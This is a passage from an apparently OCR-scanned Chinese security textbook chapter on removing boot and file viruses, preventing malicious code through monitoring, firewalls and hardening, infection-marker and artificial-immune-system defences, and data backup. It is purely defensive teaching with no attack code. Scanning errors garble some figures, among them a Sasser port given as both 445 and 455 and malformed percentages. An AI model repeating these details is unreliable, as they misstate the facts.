(2) 硬盘 或 软盘 的 BOOT 扇 区 。 

(3) 为 保存 原 主 引导 扇 区 .BOOT 扇 区 ,病毒 可 能 随意 地 将 它们 写 入 其 他 扇 区 ,而 毁坏 
这 些 扇 区 。 

(4) 引导 型 病毒 发 作 时 ,执行 破坏 行为 造成 种 种 损坏 。 

根据 引导 区 病毒 感染 和 破坏 部 位 的 不 同 ,可 以 分 以 下 几 种 方法 进行 修复 。 

第 一 种 : 硬盘 主 引导 扇 区 染 毒 。 

硬盘 引导 区 染 毒 是 可 以 修复 的 ,修复 步骤 为 : 用 干净 的 软盘 启动 系统 ; 加 寻找 一 台 
同类 型 .硬盘 分 区 相同 的 无 毒 计算 机 ,将 其 硬盘 主 引导 扇 区 写 人 一 张 软盘 中 ; @ 将 此 软盘 插 
入 被 感染 计算 机 ,将 其 中 采集 的 主 引 导 扇 区 数据 写 和 人 染 毒 硬盘 , 即 可 修复 。 

第 二 种 : 硬盘 、 软 盘 BOOT 扇 区 染 毒 。 

这 种 情况 也 是 可 以 修复 的 。 修 复方 法 是 寻找 与 染 毒 盘 相 同 版 本 的 干净 系统 软盘 ,执行 
SYS 命令。 
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第 三 种 : 目录 区 修复 。 

如 果 引 导 区 病毒 将 原 主 引导 扇 区 或 BOOT 扇 区 履 盖 式 写 入 根 目录 区 ,被 覆盖 的 根 目 录 
区 完全 损坏 ,不 可 能 修复 。 如 果 仅 仅 覆盖 式 写 和 人 第 一 FAT 表 时 ,第 二 FAT 表 未 被 破坏 , 则 
可 以 修复 。 修 复方 法 是 将 第 二 FAT 表 复制 到 第 一 FAT 表 中 。 

第 四 种 : 占用 空间 的 回收 。 

引导 型 病毒 占用 的 其 他 部 分 磁盘 空间 ,一 般 都 标示 为 “ 坏 复 ?或 “文件 结束 簇 ”。 系 统 不 
能 再 使 用 标示 后 的 磁盘 空间 ,当然 ,这 些 被 标示 的 空间 也 是 可 以 收回 的 。 

2. 文件 型 病毒 的 清除 原理 

在 文件 型 病毒 中 ,覆盖 型 病毒 是 最 恶劣 的 。 覆 盖 型 文件 病毒 硬性 覆盖 了 一 部 分 宿主 程序 ， 
使 宿主 程序 的 部 分 信息 丢失 ,即使 把 病毒 杀 掉 ,程序 也 已 经 不 能 修复 了 。 对 覆盖 型 病毒 感染 的 
文件 只 能 将 其 彻底 删除 ,没有 挽救 原文 件 的 余地 。 如 果 没 有 备份 ,将 造成 很 大 的 损失 。 

除了 覆盖 型 病毒 之 外 ,其 他 感染 COM 和 EXE 的 文件 型 病毒 都 可 以 被 清除 干净 。 因 为 
病毒 在 感染 原文 件 时 没有 丢弃 原始 信息 ,既然 病毒 能 在 内 存 中 恢复 被 感染 文件 的 代码 并 了 予 
以 执行 , 则 可 以 按照 病毒 传染 的 逆 过 程 将 病毒 清除 干净 ,并 恢复 到 其 原来 的 功能 。 

如 果 染 毒 的 文件 有 备份 的 话 , 把 备份 的 文件 复制 一 下 也 可 以 简单 地 恢复 原文 件 ,就 不 需要 
专门 去 清除 了 。 执 行文 件 车 加 上 自修 复 功能 的 话 , 遇 到 病毒 的 时 候 , 程 序 可 以 自行 复原 ; 如 果 
文件 没有 加 上 任何 防护 的 话 , 就 只 能 够 靠 杀毒 软件 来 清除 ,但 是 ,用 杀毒 软件 来 清除 病毒 也 不 
能 保证 完全 复原 原 有 的 程序 功能 ,甚至 有 可 能 出 现 越 清除 越 糟糕 ,以 至 于 造成 在 清除 病毒 之 后 
文件 反而 不 能 执行 的 局 面 。 因 此 ,用 户 必须 靠 自己 平日 备份 自己 的 资料 来 确保 万 无 一 失 。 

由 于 某 些 病 毒 会 破坏 系统 数据 ,如 破坏 目录 结构 和 FAT, 因 此 在 清除 完 病毒 之 后 ,还 要 
进行 系统 维护 工作 。 可 见 ,病毒 的 清除 工作 与 系统 的 维护 工作 往往 是 分 不 开 的 。 

3. 清除 交叉 感染 病毒 

有 时 一 台 计 算 机 内 同时 潜伏 着 几 种 病毒 , 当 一 个 健康 程序 在 这 个 计算 机 上 运行 时 ,会 感 
染 多 种 病毒 ,引起 交叉 感染 。 

多 种 病毒 在 一 个 宿主 程序 中 形成 交叉 感染 后 ,如 果 在 这 种 情况 下 杀毒 ,一 定 要 格外 小 
心 , 必 须 分 清 病 毒 感染 的 先后 顺序 , 先 清除 感染 的 病毒 ,否则 会 把 程序 * 杀 死 ”。 虽 然 病毒 被 
杀 死 了 ,但 程序 也 不 能 使 用 了 。 

一 个 交叉 感染 多 个 病毒 的 结构 示意 图 如 图 10-1 所 示 。 从 图 10-1 中 可 以 看 出 ,病毒 的 
感染 顺序 是 : 病毒 1 一 病毒 2 一 病毒 3。 

当 运 行 被 感染 的 宿主 程序 时 ,病毒 夺取 计算 机 的 控制 权 , 先 运行 病毒 程序 ,顺序 是 : 病 
毒 3 一 病毒 2 一 病毒 1 。 


头 部 病毒 3 
宿主 文件 病毒 2 
尾部 病毒 1 
病毒 1 头 前 
病毒 2 宿主 文件 
病毒 3 尾 训 


10-1 病毒 交叉 感染 结构 示意 图 
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在 杀毒 时 ,应 先 清除 病毒 3; 然后 清除 病毒 2; 最 后 清除 病毒 1 ,层次 分 明 , 不 能 混乱 ,和 否 
则 会 破坏 宿主 程序 。 


10.5.2 恶意 代码 的 清除 方法 


恶意 代码 的 清除 可 分 为 手工 清除 和 自动 清除 两 种 方法 。 
手工 清除 恶意 代码 的 方法 使 用 Debug、Regedit、SoftICE 和 反 汇 编 语言 等 简单 工具 , 借 
助 于 对 某 种 恶意 代码 的 具体 认识 ,从 感染 恶意 代码 的 文件 中 ,摘除 恶意 代码 ,使 之 复原 。 手 
工 操作 复杂 、 速 度 慢 、 风 险 大 ,需要 熟练 的 技能 和 丰富 的 知识 。 

自动 清除 方法 是 使 用 查 杀 软件 进行 自动 清除 恶意 代码 并 使 其 复原 的 方法 。 自 动 清 除 方 
法 的 操作 简单 ,效率 高 .风险 小 。 当 遇 到 被 感染 的 文件 急需 恢复 而 又 找 不 到 查 杀 软件 或 软件 
无 效 时 , 才 会 使 用 手工 修复 的 方法 。 从 与 恶意 代码 对 抗 的 全 局 情况 来 看 ,人 们 总 是 从 手工 清 
除开 始 , 获 取 一 定 经 验 后 再 研制 成 相应 的 软件 产品 ,使 计算 机 自动 地 完成 全 部 清除 操作 。 
手工 修复 很 麻烦 ,而 且 容易 出 错 ,还 要 求 对 恶意 代码 的 原理 很 熟悉 。 用 查 杀 软件 进行 自 
动 清除 则 比较 省 事 ,一 般 按照 菜单 提示 和 联机 帮助 就 可 以 工作 了 。 自 动 清除 的 方法 基本 上 
是 将 手工 操作 加 以 编码 并 用 程序 实现 ,其 工作 原理 是 一 样 的 。 为 了 使 用 方便 , 查 杀 软件 需要 
附加 许多 功能 ,包括 用 户 界面 .错误 和 例外 情况 检测 和 处 理 、 磁 盘 目 录 搜 索 、 联 机 帮助 .内 存 
的 检测 与 清除 .报告 生成 ,对 网 络 驱动 器 的 支持 、 软 件 自 身 完整 性 ( 防 恶 意 代 码 和 防臭 改 ) 的 
保护 措施 及 对 多 种 恶意 代码 的 检测 和 清除 能 力 等 。 

如 果 自 动 方法 和 手工 方法 仍 不 奏效 , 那 就 只 能 对 磁盘 进行 低级 格式 化 了 。 经 过 格式 化 ， 
虽然 可 以 清除 所 有 恶意 代码 ,但 却 以 磁盘 上 所 有 文件 的 丢失 作为 代价 。 


10.6 ”恶意 代码 的 预防 


恶意 代码 的 预防 技术 是 指 通过 一 定 的 技术 手段 防止 恶意 代码 对 计算 机 系统 进行 传染 和 
破坏 。 实 际 上 它 是 一 种 预先 的 特征 判定 技术 。 具 体 来 说 ,恶意 代码 的 预防 是 通过 阻止 恶意 
代码 进入 系统 或 阻止 恶意 代码 对 磁盘 的 操作 尤其 是 写 操作 ,以 达到 保护 系统 的 目的 。 恶意 
代码 的 预防 技术 主要 包括 磁盘 引导 区 保护 、 加 密 可 执行 程序 , 读 写 控 制 技术 、 系 统 监 控 技术 、 
个 人 防火 墙 技术 、 系 统 加 固 等 。 在 蠕虫 泛滥 的 今天 ,系统 加 固 方法 的 地 位 越 来 越 重 要 ,处 于 
不 可 替代 的 地 位 。 


10.6.1 系统 监控 技术 


系统 监控 技术 (实时 监控 技术 ) 已 经 形成 了 包括 注册 表 监 控 \ 脚 本 监控 \ 内 存 监 控 、 邮 件 
监控 ,文件 监控 在 内 的 多 种 监控 技术 。 它 们 协同 工作 形成 的 防护 体系 ,使 计算 机 预防 恶意 代 
码 的 能 力 大 大 增强 。 据 统计 ,计算 机 只 要 运行 实时 监控 系统 并 进行 及 时 升级 ,基本 上 能 预防 
80% 的 恶意 代码 ,这 一 完整 的 防护 体系 已 经 被 所 有 的 安全 公司 认可 。 当 前 ,几乎 每 个 恶意 代 
码 防范 产品 都 提供 了 这 些 监 控 手 段 。 

实时 监控 概念 最 根本 的 优点 是 解决 了 用 户 对 恶意 代码 的 “未 知性 ”, 或 者 说 是 “不 确定 
性 ”问题 。 用 户 的 “未 知性 ”其 实 是 计算 机 反 恶 意 代码 技术 发 展 至 今 一 直 没有 得 到 很 好 解决 
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的 问题 之 一 。 值 得 一 提 的 是 ,到 现在 还 总 是 会 听 到 有 人 说 :“ 有 病毒 ? 用 杀毒 软件 杀 就 行 
了 .问题 出 在 这 个 “有 ”? 字 上 ,用户 判断 有 无 恶意 代码 的 标准 是 什么 ? 实际 上 等 到 用 户 感觉 
到 系统 中 确实 有 恶意 代码 在 作怪 的 时 候 , 系 统 可 能 已 到 了 骨 溃 的 边缘 。 

实时 监控 是 先前 性 的 ,而 不 是 滞后 性 的 。 任 何 程序 在 调用 之 前 都 必须 先 过 滤 一 遍 。 一 
且 有 恶意 代码 侵入 , 它 就 报警 ,并 自动 查 杀 , 将 恶意 代码 拒 之 门 外 , 做 到 防 患 于 未 然 。 这 和 等 
恶意 代码 侵入 后 甚至 遭 到 破坏 后 再 去 杀毒 是 不 一 样 的 ,其 安全 性 更 高 。 互 联网 是 大 趋势 , 它 
本 身 就 是 实时 的 .动态 的 ,网 络 已 经 成 为 恶意 代码 传播 的 最 佳 途径 ,迫切 需要 具有 实时 性 的 
反 恶 意 代 码 软 件 。 

实时 监控 技术 能 够 始终 作用 于 计算 机 系统 之 中 ,监控 访问 系统 资源 的 一 切 操 作 , 并 能 够 
对 其 中 可 能 含有 的 恶意 代码 进行 清除 ,这 也 与 及早 发 现 、 及 早 根治 "的 医学 上 早期 治疗 方针 
不 谋 而 合 。 


10.6.2 个 人 防火 墙 技术 


个 人 防火 墙 以 软件 形式 安装 在 最 终 用 户 计算 机 上 ,阻止 由 外 到 内 和 由 内 到 外 的 威胁 。 
个 人 防火 墙 不 仅 可 以 监测 和 控制 网 络 级 数据 流 , 而 且 可 以 监测 和 控制 应 用 级 数据 流 , 弥 补 边 
际 防火 墙 和 防 病毒 软件 等 传统 防御 手段 的 不 足 。 个 人 防火 墙 和 边际 防火 墙 的 区 别 是 ,前 者 
可 以 监测 和 控制 应 用 级 数据 流 。 如 果 一 个 本 不 应 该 对 外 联网 的 应 用 程序 对 外 发 起 了 网 络 连 
接 , 个 人 防火 墙 就 会 将 这 个 行为 报告 给 用 户 , 这 可 以 预防 木马 ,后 门 等 恶意 代码 的 攻击 。 

个 人 防火 墙 的 作用 是 阻 断 这 些 不 安全 的 网 络 行为 。 它 对 计算 机 发 往外 界 的 数据 包 和 外 
界 发 送 到 计算 机 的 数据 包 进行 分 析 和 过 滤 ,把 不 正常 的 .恶意 的 和 具备 攻击 性 的 数据 包 拦 截 
下 来 ,并 且 向 用 户 发 出 提醒 。 

如 果 把 杀毒 软件 比 作 铠甲 和 防弹 衣 :那么 个 人 防火 墙 可 以 比 作 是 护城河 或 是 屏蔽 网 , 隔 
断 内 外 的 通信 和 往来 ,使 得 外 界 无 法 进入 内 网 ,也 侦查 不 到 内 部 的 情况 ,而 内 部 人 员 也 无 法 
越过 这 层 保护 把 信息 送 达 出 去 。 除 了 阻 断 非法 对 外 发 送 密码 等 私密 信息 、 阻 挡 外 界 的 控制 
外 ,个 人 防火 墙 的 作用 还 在 于 屏蔽 来 自 外 界 的 攻击 ,如 探测 本 地 的 信息 和 一 些 频繁 的 流入 数 
据 包 。 

此 外 ,个 人 防火 墙 的 最 大 特点 是 采用 以 应 用 程序 为 中 心 的 方式 控制 数据 流 , 根 据 应 用 程 
序 开放 和 关闭 端口 。 例 如 ,Sasser 蠕虫 试图 通过 445 端口 连接 到 PC, 而 个 人 防火 墙 能 够 通 
过 关闭 455 端口 防止 PC 感染 Sasser 蠕虫 。 个 人 防火 墙 通过 监测 应 用 程序 向 操作 系统 发 
出 的 通信 请 求 ,来 进行 应 用 程序 级 的 访问 控制 。 首 先 , 个 人 防火 墙 将 每 个 应 用 程序 与 它 
发 出 的 网 络 连接 请 求 建立 关系 。 然 后 ,个 人 防火 墙根 据 用 户 定义 的 规则 ,决定 允许 或 是 
拒绝 该 应 用 程 学 的 网 络 连接 请 求 。 这 样 可 以 防止 未 经 许可 的 应 用 程序 建立 与 Internet 的 
非法 连接 。 个 人 防火 墙 可 以 有 效 阻止 蠕虫 、 木 马 和 间谍 软件 的 非法 数据 连接 ,进而 对 它 
们 有 效 防范 。 


10.6.3 系统 加 固 技术 


系统 加 固 是 防 黑客 领域 的 基本 问题 ,主要 是 通过 配置 系统 的 参数 (如 服务 .端口 \ 协 议 
等 ) 或 给 系统 打 补 丁 来 减少 系统 被 人 侵 的 可 能 性 。 常 见 的 系统 加 固 工作 主要 包括 安装 最 新 
补丁 ` 禁 止 不 必要 的 应 用 和 服务 .禁止 不 必要 的 账号 ,去除 后 门 、. 内 核 参 数 及 配置 调整 、 系 统 
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最 小 化 处 理 , 加 强 口令 管理 ,启动 日 志 审 计 功 能 等 。 

在 防范 恶意 代码 领域 ,系统 补丁 的 管理 已 经 成 了 商业 软件 的 必 选 功能 。 例 如 ,360 安全 
卫士 就 以 补丁 管理 著称 。 一 般 来 说 , 和 计算 机 相关 的 补丁 不 外 乎 系统 安全 补丁 程序 bug 
补丁 、 英 文 汉化 补丁 、 硬 件 支持 补丁 和 游戏 补丁 这 5 类 。 其 中 ,系统 安全 补丁 是 最 重要 的 。 

所 谓 系 统 安全 补丁 ,主要 是 针对 操作 系统 来 量 身 定制 的 。 就 最 常用 的 Windows 操作 系 
统 而 言 , 由 于 开发 工作 复杂 代码 量 巨大 ,蓝屏 死机 或 者 是 非法 错误 都 是 家 常 便 饭 了 。 而 且 
在 网 络 时 代 , 有 人 会 利用 系统 的 漏洞 侵入 用 户 的 计算 机 并 盗 取 重 要 文件 。 因 此 微软 公司 不 
断 推出 各 种 系统 安全 补丁 , 旨 在 增强 系统 安全 性 和 稳定 性 。 


10.7 恶意 代码 的 免疫 


给 生物 有 机 体 注射 疫苗 ,可 以 提高 其 对 生物 病毒 的 抵抗 能 力 。 同 样 ,采用 给 计算 机 注射 
恶意 代码 疫苗 的 方法 ,可 以 预防 计算 机 系统 的 恶意 代码 。 
恶意 代码 的 免疫 技术 出 现 非常 早 , 但 是 没有 很 大 发 展 。 针 对 某 一 种 恶意 代码 的 免疫 方 
已 经 没有 人 再 用 了 ,目前 尚 没有 出 现 通 用 的 能 对 各 种 恶意 代码 都 有 免疫 作用 的 技术 。 从 
某 种 程度 上 来 说 ,也 许 根本 就 不 存在 这 样 一 种 技术 。 根 据 免疫 的 性 质 , 可 以 把 它 归 为 预防 技 
术 。 从 本 质 上 讲 , 对 计算 机 系统 而 言 , 计 算 机 预防 技术 是 被 动 预防 技术 ,利用 外 围 的 技术 提 
高 计算 机 系统 的 防范 能 力 ; 计算 机 免疫 技术 是 主动 的 预防 技术 ,通过 计算 机 系统 本 身 的 技 
术 提 高 自己 的 防范 能 力 。 


10.7.1 传统 恶意 代码 免疫 方法 


恶意 代码 的 传染 模块 一 般 包括 传染 条 件 判断 和 实施 传染 两 部 分 。 在 恶意 代码 被 激活 的 
状态 下 ,恶意 代码 程序 通过 判断 传染 条 件 的 满足 与 否 来 决定 是 否 对 目标 对 象 进行 传染 。 一 
般 情况 下 ,恶意 代码 程序 为 了 防止 重复 感染 同一 个 对 象 ,都 要 给 被 传染 对 象 加 上 传染 标识 。 
检测 被 攻击 对 象 是 否 存 在 这 种 标识 是 传染 条 件 判 断 的 重要 环节 。 若 存在 这 种 标识 , 则 恶意 
代码 程序 不 对 该 对 象 进行 传染 ; 若 不 存在 这 种 标识 , 则 恶意 代码 程序 就 对 该 对 象 实施 传染 。 
基于 这 种 原理 ,自然 会 想到 ,如 果 在 正常 对 象 中 加 上 这 种 标识 ,就 可 以 不 受 恶 意 代码 的 传染 ， 
以 达到 免疫 的 效果 。 

从 实现 恶意 代码 免疫 的 角度 看 ,可 以 将 恶意 代码 的 传染 分 为 两 种 。 一 种 是 在 传染 前 先 
检查 待 传染 对 象 是 否 已 经 被 自身 传染 过 ,如 果 没 有 则 进行 传染 ; 如 果 传 染 了 则 不 再 重复 进 
行 传染 。 这 种 用 作 判 断 是 否 被 恶意 代码 自身 传染 的 特殊 标志 被 称 为 传染 标识 。 第 二 种 是 在 
传染 时 不 判断 是 否 存 在 免疫 标识 ,恶意 代码 只 要 找到 一 个 可 传染 对 象 就 进行 一 次 传染 。 就 
像 黑色 星期 五 那样 ,一 个 文件 可 能 被 黑色 星期 五 反复 传染 多 次 ,滚雪球 一 样 越 滚 越 大 。 在 过 
去 ,对 于 前 一 种 恶意 代码 容易 进行 免疫 ,而 对 后 一 种 恶意 代码 的 免疫 非常 难 实现 。 

传统 的 安全 软件 使 用 过 的 免疫 方法 有 以 下 两 种 。 

1. 基于 感染 标识 的 免疫 方法 

在 成 功 感染 后 ,小 球 病毒 会 在 DOS 引导 扇 区 的 1FCH 处 填 上 1357H。 因 此 , 当 小 球 病 
毒 在 引导 区 里 检查 到 这 个 标志 就 认为 已 经 成 功 感 染 过 ,就 不 再 对 它 进 行 传染 了 。1575 文件 
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型 病毒 的 特殊 标志 是 文件 尾部 的 内 容 为 0CH 和 0AH 的 两 个 字 节 。 这 种 免疫 方法 的 优点 
是 可 以 有 效 地 防止 某 一 种 特定 恶意 代码 的 传染 。 但 缺点 也 很 严重 ,因此 ,当前 使 用 这 种 免疫 
方法 的 商品 化 安全 防范 软件 已 经 不 存在 了 。 

在 恶意 代码 防范 的 初期 ,由 于 恶意 代码 的 数量 非常 少 ,该 免疫 方法 曾经 很 流行 。 但 是 该 
方法 存在 的 缺点 也 相当 明显 ,有 以 下 几 方 面 。 

(1) 对 于 不 设 有 感染 标识 的 恶意 代码 不 能 达到 免疫 的 目的 。 

(2) 当 亚 意 代码 变种 时 ,不 再 使 用 原 免疫 标志 ,该 方法 就 失效 了 。 

(3) 某 些 恶意 代码 的 免疫 标志 不 容易 仿制 。 需 要 对 原文 件 要 做 大 的 改动 才能 加 上 这 种 


(4) 由 于 恶意 代码 的 种 类 较 多 ,如 果 一 个 对 象 加 上 所 有 恶意 代码 的 免疫 标识 , 则 会 导致 
其 体积 大 增 。 

(5) 这 种 方法 能 阻止 传染 , 却 不 能 阻止 其 他 行为 。 

2. 基于 完整 性 检查 的 免疫 方法 

基于 完整 性 检查 的 免疫 方法 只 能 用 于 文件 而 不 能 用 于 引导 扇 区 。 这 种 方法 的 原理 是 : 
为 可 执行 程序 增加 一 个 免疫 外 壳 , 同 时 在 免疫 外 壳 中 记录 有 关 用 于 完整 性 检查 的 信息 。 执 
行 具有 这 种 免疫 功能 的 程序 时 ,免疫 外 壳 首 先 运行 ,检查 自身 的 程序 校 验 和 , 若 未 发 现 异 常 ， 
则 转 去 执行 受 保护 的 程序 。 

不 论 什 么 原因 使 这 些 程序 改变 或 破坏 ,免疫 外 壳 都 可 以 检查 出 来 ,并 发 出 警告 ,用户 可 
选择 进行 自 毁 、 重 新 引导 启动 计算 机 或 继续 等 操作 。 这 种 免疫 方法 可 以 看 作 是 一 种 通用 的 
自我 完整 性 检验 方法 。 这 种 方法 不 只 是 针对 恶意 代码 的 ,对 于 其 他 原因 造成 的 文件 变化 , 免 
疫 外 这 程序 也 都 能 检查 出 来 并 报警 。 

但 同样 ,该 方法 存在 以 下 一 些 不 足 。 

(1) 每 个 受到 保护 的 文件 都 要 需要 额外 的 存储 空间 。 

(2) 现在 常用 的 一 些 校 验 码 算法 仍 不 能 满足 防 恶意 代码 的 需要 。 

(3) 无 法 对 付 覆 盖 型 的 文件 型 恶意 代码 。 

(4) 有 些 类 型 的 文件 不 能 使 用 外 加 免疫 外 壳 的 防护 方法 。 

(5) 一 旦 恶意 代码 被 免疫 外 壳 包 在 里 面 时 , 它 就 成 了 被 保护 的 恶意 代码 。 


10.7.2 ”人工 免疫 系统 


1986 年 ,美国 Los Alamos 国家 实验 室 的 J. Doyne Farmer、Norman H. Packard 和 Alan 
S. Perelson 三 人 率先 提出 了 人 工 免 疫 的 概念 。 人 工 免 疫 系 统 是 受 生物 免疫 系统 (Biological 
Immune System,BIS) 启 发 而 产生 的 智能 计算 方法 ,通过 模拟 免疫 系统 的 功能 、 原 理 和 模型 
来 解决 复杂 的 实际 问题 ,具有 自 组 织 、 自 适应 、 记 忆 和 分 布 式 等 优势 ,目前 已 在 数据 挖掘 、 模 
式 识别 、 机 器 学 习 、 信 息 安 全 等 多 个 领域 广泛 应 用 。 早 在 2002 年 ,Paul K. Harmer 等 人 就 提 
出 了 一 个 人 工 免疫 原理 在 计算 机 安全 领域 的 应 用 框架 ,指出 了 人 工 免 疫 原理 在 恶意 代码 检 
测 、 入 侵 检 测 等 领域 的 应 用 。 

第 一 代 AIS 基于 传统 免疫 系统 的 自体 / 非 自 体 (Self/Non-self, SNS) 理 论 ,其 核心 思想 
是 机 体 对 自体 (Self) 和 非 自体 (Non-self) 的 区 分 。 

1994 年 ,美国 学 者 Stephanie Forrest 等 人 根据 自体 / 非 自 体 理论 ,提出 了 和 否定 选择 算法 
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(Negative Selection Algorithm,NSA) 来 识别 自体 。 该 算法 模拟 了 机 体 免疫 细胞 成 熟 的 过 
程 , 算 法 包括 两 个 阶段 :自体 耐 受 阶 段 和 识别 阶段 。 在 自体 耐 受 阶段 ,首先 随机 生成 大 量 候 
选 检测 器 ,然后 ,候选 检测 器 经 过 自体 耐 受过 程 去 除 匹配 自体 的 检测 器 ,最 终 成 为 成 熟 检测 
器 ;在 识别 阶段 采用 成 熟 检测 器 检测 未 知 抗原 。 和 否定 选择 算法 首先 应 用 于 UNIX 系统 的 异 
常 进程 检测 。2000 年 ,巴西 学 者 Castro 等 人 首次 将 生物 学 的 克隆 选择 理论 引入 工程 计算 领 
域 ,提出 了 克隆 选择 算法 (Clonal Selection Algorithm,CSA) ,后 命名 为 CLONALG。 该 算 
法 可 用 于 解决 模式 识别 、 多 峰 优化 和 组 合 优化 等 工程 问题 。 

第 二 代 AIS 基于 危险 理论 (Danger Theory)。1994 年 ,免疫 学 专家 Polly Matzinger 博 
士 提 出 了 危险 理论 。 她 认为 危险 信号 才 是 引发 机 体 免 疫 响 应 的 关键 ,机 体 的 免疫 系统 通过 
识别 危险 信号 来 产生 相应 的 保护 机 制 , 而 不 是 SNS 理论 中 认为 的 非 自 体 的 异己 性 。 和 危险 信 
号 的 产生 与 检测 是 危险 理论 的 核心 。 她 指出 , 仅 赁 Non-self 并 不 能 引发 免疫 反应 ,机 体 要 
防范 的 是 危险 ,而 不 是 Non-self。 和 危险 理论 的 提出 不 仅 引 发 了 免疫 学 界 的 革命 ,也 一 并 解决 
了 SNS 理论 存在 的 Self 集 动态 更 新 和 Self 集 过 于 庞大 的 问题 。 

2002 年 ,英国 诺丁汉 大 学 的 Uwe Aickelin 博士 首次 将 危险 理论 引入 人 工 免疫 系统 中 ， 
分 析 了 将 危险 理论 应 用 于 网 络 人 侵 检测 的 可 行 性 。Julie Greensmith 等 人 在 2005 年 模仿 树 
突 细胞 工作 机 制 , 提 出 并 实现 了 基于 危险 理论 的 树 突 细胞 算法 (Dendritic Cell Algorithm， 
DCA) ,并 成 功 地 应 用 到 了 异常 检测 .SYN 端口 扫描 检测 及 垃圾 信息 过 滤 等 问题 中 。 

恶意 代码 防范 或 预防 的 目的 就 在 于 保障 系统 /应 用 的 功能 和 性 能 ,与 生物 机 体 的 免疫 在 
目标 上 有 一 致 性 。 尤 其 是 生物 免疫 学 危险 理论 核心 思想 与 恶意 代码 防范 的 思想 不 谋 而 
合 一 一 危险 信号 /安全 威胁 的 检测 是 核心 。 在 恶意 代码 防范 中 ,如 何 对 安全 威胁 的 类 型 .级 
别 进行 定义 和 识别 是 技术 关键 。 

目前 基于 人 工 免疫 系统 的 恶意 代码 检测 技术 已 有 一 些 研究 成 果 。Dhaeseleer P. 等 人 采 
用 否定 选择 算法 来 检测 被 保护 数据 和 程序 文件 的 变化 ,该 方法 可 以 检测 未 知 病毒 ,但 只 能 针 
对 静态 数据 和 软件 进行 检测 。Lee 等 则 基于 SNS 理论 ,从 程序 入 口 点 开始 提取 一 系列 字符 
串 来 区 分 自体 与 非 自体 ,以 实现 恶意 代码 的 检测 。James Brown 等 提出 了 基于 否定 选择 算 
法 的 移动 恶意 代码 检测 器 mAIS。mAIS 采用 善意 移动 应 用 检测 集 和 恶意 移动 应 用 两 套 检 
测 集 ,利用 分 裂 检 测 器 法 (Split Detector Method,SDM) 来 识别 Android 应 用 中 的 信息 流 ， 
从 而 判定 恶意 Android 应 用 ,识别 率 高 达 93. 33%。 芦 天 亮 等 人 针对 移动 恶意 代码 的 检测 
问题 ,提出 使 用 否定 选择 算法 生成 检测 器 ,利用 克隆 选择 算法 提高 抗原 亲和力 ,该 方法 还 可 
以 识别 出 经 过 加 密 和 代码 混淆 后 的 恶意 代码 。 

遗憾 的 是 ,目前 大 部 分 基于 人 工 免 疫 的 恶意 代码 研究 还 集中 于 检测 模型 ,还 没有 很 好 的 
基于 人 工 免疫 的 恶意 代码 清除 方案 ,并 没有 形成 完整 的 恶意 代码 免疫 方案 。 和 希望 随 着 人 工 
智能 技术 的 发 展 , 基 于 人 工 免 疫 系统 的 恶意 代码 防范 会 有 更 多 的 成 果 。 


10.8 数据 备份 与 数据 恢复 的 意义 


数据 丢失 看 上 去 并 不 像 一 种 真正 的 安全 威胁 .但 它 确实 是 非常 严重 的 安全 问题 。 如 果 
用 户 丢失 了 数据 ,是 因为 茶水 倒 在 了 笔记 本 上 导致 的 ,还 是 由 于 恶意 代码 的 攻击 导致 的 ,这 
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种 


两 者 存在 根本 的 区 别 吗 ? 从 数据 已 经 丢失 这 个 事实 来 看 ,两 者 都 是 安全 威胁 。 

2001 年 9 月 11 日 ,美国 世贸 中 心 大 楼 发 生 爆 炸 。 一 年 后 ,原本 设立 在 该 楼 的 350 家 公 
司 能 够 继续 营业 的 只 有 150 家 ,其 他 很 多 企业 由 于 无 法 恢复 业务 相关 的 重要 数据 而 被 迫 倒 
闭 。 但 是 ,世贸 中 心 最 大 的 主 顾 之 一 摩根 土 丹 利 宣布 ,双子 楼 的 倒塌 并 没有 导致 关键 数据 的 
丢失 。 

这 主要 是 因为 ,摩根 土 丹 利 精心 构造 的 远程 防 灾 系统 ,能 够 实时 将 重要 的 业务 信息 备份 
到 几 英 里 之 外 的 数据 中 心 。 大 楼 倒塌 之 后 ,该 数据 中 心 立刻 发 挥 作用 ,保障 了 公司 业务 的 继 
续 运 行 , 有 效 降低 了 灾难 对 于 整个 企业 发 展 的 影响 。 摩 根 士 丹 利 在 第 二 天 就 进入 了 正常 的 
工作 状态 。 摩 根 土 丹 利 几 年 前 就 制定 的 数据 安全 战略 ,在 这 次 大 劫难 中 发 挥 了 令 人 瞩目 的 
作用 。 

据 统计 在 数据 丢失 事件 中 ,硬件 故障 是 导致 数据 丢失 的 最 主要 原因 , 占 全 部 丢失 事件 的 
42% ,其 中 包括 由 于 硬盘 驱动 器 的 故障 和 突然 断 电 带 来 的 数据 丢失 。 人 为 原因 占 了 全 部 数 
据 丢失 事件 的 23%% ,包括 数据 的 意外 删除 及 硬件 的 意外 损坏 (如 硬盘 跌落 导致 的 损失 )。 软 
件 原 因 占 了 数据 丢失 事件 的 13% 。 盗 窃 占 了 全 部 数据 丢失 事件 的 5 。 硬 件 的 毁坏 占 了 所 
有 数据 丢失 事件 的 3% ,包括 洪水 雷击 和 停电 造成 的 毁坏 。 最 后 ,恶意 代码 攻击 占 了 全 部 
数据 丢失 事件 的 14% ,包括 各 种 类 型 的 恶意 代码 。 近 年 来 , 随 着 恶意 代码 的 进一步 恶化 ,其 
造成 的 数据 丢失 也 有 上 升 的 趋势 。 

为 了 减少 由 恶意 代码 导致 的 数据 丢失 带 来 的 损失 ,我 们 在 大 力 发 展 恶意 代码 防范 技术 
的 同时 ,还 要 重视 数据 备份 和 数据 恢复 策略 。 只 要 对 数据 备份 和 数据 恢复 给 予 足够 的 重视 ， 
即使 恶意 代码 破坏 力 再 强 , 其 损失 也 会 在 可 控 范 围 内 。 


10.8.1 数据 备份 


数据 备份 策略 要 决定 何 时 进行 备份 ,备份 哪 种 数据 ,以 及 出 现 故 障 时 进行 恢复 的 方式 。 
根据 工作 环境 的 规模 ,可 以 简单 地 分 为 个 人 PC 备份 策略 和 系统 级 备份 策略 两 类 分 别 进行 
介绍 。 

1. 个 人 PC 备份 策略 

个 人 PC 备份 策略 可 以 作为 个 人 计算 机 防范 恶意 代码 攻击 的 方法 之 一 。 该 策略 主要 考 
虑 了 一 些 单机 用 户 的 重要 数据 备份 。 这 些 数据 包括 以 下 几 个 方面 。 

1) 备份 个 人 数据 

所 谓 个 人 数据 ,就 是 用 户 个 人 劳动 的 结晶 ,包括 用 户 自 己 经 过 思维 活动 创作 的 各 种 文 
档 \ 编 制 的 各 种 源 代码 、 下 载 或 从 其 他 途径 获取 的 有 用 数据 和 程序 等 。“ 一 寸 光阴 一 寸 金 ”， 
